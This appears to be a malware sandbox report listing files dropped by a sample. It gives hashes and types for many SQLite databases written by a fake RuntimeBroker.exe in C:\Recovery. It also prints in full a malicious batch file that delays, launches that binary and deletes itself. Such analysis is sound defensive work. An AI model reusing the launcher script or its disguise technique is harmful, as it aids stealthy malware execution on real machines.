                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Nov 12 00:49:49 2024, 1st section name ".debug$S"
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1952
                                                                                                            Entropy (8bit):4.550525359687426
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:HBbW96XOmCQDfHEYwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:q2knKhmMluOulajfqXSfbNtmh5Z
                                                                                                            MD5:852EE90062650E41247A0C54253EE73D
                                                                                                            SHA1:55710DB6D416A2B618A555639D17D89593EB4D45
                                                                                                            SHA-256:82F28981AE99C67B068D57B55E11D85A754820B8180E296D69E3DF4E3860AD3A
                                                                                                            SHA-512:209E0773443DBFF77134EDD5F3E0BE9FB259AC463F4C01196A9887E5BD7C7C3F79EE0E367CEB36A91A1941D885CB3B312C559F32AA6B8DB3BA4F25A0FF87D647
                                                                                                            Malicious:false
                                                                                                            Preview:L...-.2g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESA9C5.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):205
                                                                                                            Entropy (8bit):5.139036322887519
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE7ZxvIKOZG1wkn23fHK:HTg9uYDE7vCf/K
                                                                                                            MD5:12D582A11F3BFFA6B2895E9476794110
                                                                                                            SHA1:EED4FE7D16C0810A50DB5D4E91E02D20AF8F3D7D
                                                                                                            SHA-256:DF1116616B891890A3100EE65CACFE9ED5A2775CE126961A8927CE43E4B379B0
                                                                                                            SHA-512:5E7E16C5DE59A98CE596B293C61A629FAC36BC2A3A4DF4E13FA167F1A20E92F0CAEC7AED5FB56DACF3FA94DED59BE052B085D8F506DF91A958322F9AF36FFC9C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TCq2JLUA0X.bat"
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):98304
                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
